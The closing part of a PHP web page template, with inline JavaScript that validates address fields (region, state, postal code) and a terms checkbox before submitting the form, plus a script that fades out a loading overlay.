                document.getElementById('region').classList.add('error');
                document.getElementById('regionError').classList.add('show');
                hasError = true;
            }
            
            if (!state || state.length === 0) {
                document.getElementById('state').classList.add('error');
                document.getElementById('stateError').classList.add('show');
                hasError = true;
            }
            
            if (!postalCode || postalCode.length === 0) {
                document.getElementById('postalCode').classList.add('error');
                document.getElementById('postalCodeError').classList.add('show');
                hasError = true;
            }
            
            if (!agree) {
                alert('<?= __('error_agree_terms') ?>');
                hasError = true;
            }
            
            if (hasError) {
                // Scroll to first error
                const firstError = document.querySelector('.error');
                if (firstError) {
                    firstError.scrollIntoView({ behavior: 'smooth', block: 'center' });
                    firstError.focus();
                }
                return false;
            }
            
            // Disable submit button to prevent double submission
            submitButton.disabled = true;
            submitButton.textContent = '<?= __('processing') ?>';
            
            // Submit form
            this.submit();
        });
    </script>

    <script>
        // Simple Loading Screen - Hide after 1.5 seconds
        setTimeout(function() {
            const loadingOverlay = document.getElementById('loading-overlay');
            if (loadingOverlay) {
                loadingOverlay.style.opacity = '0';
                loadingOverlay.style.transition = 'opacity 0.3s ease';
                setTimeout(function() {
                    loadingOverlay.remove();
                }, 300);
            }
        }, 1500);
    </script>

</body>
</html> 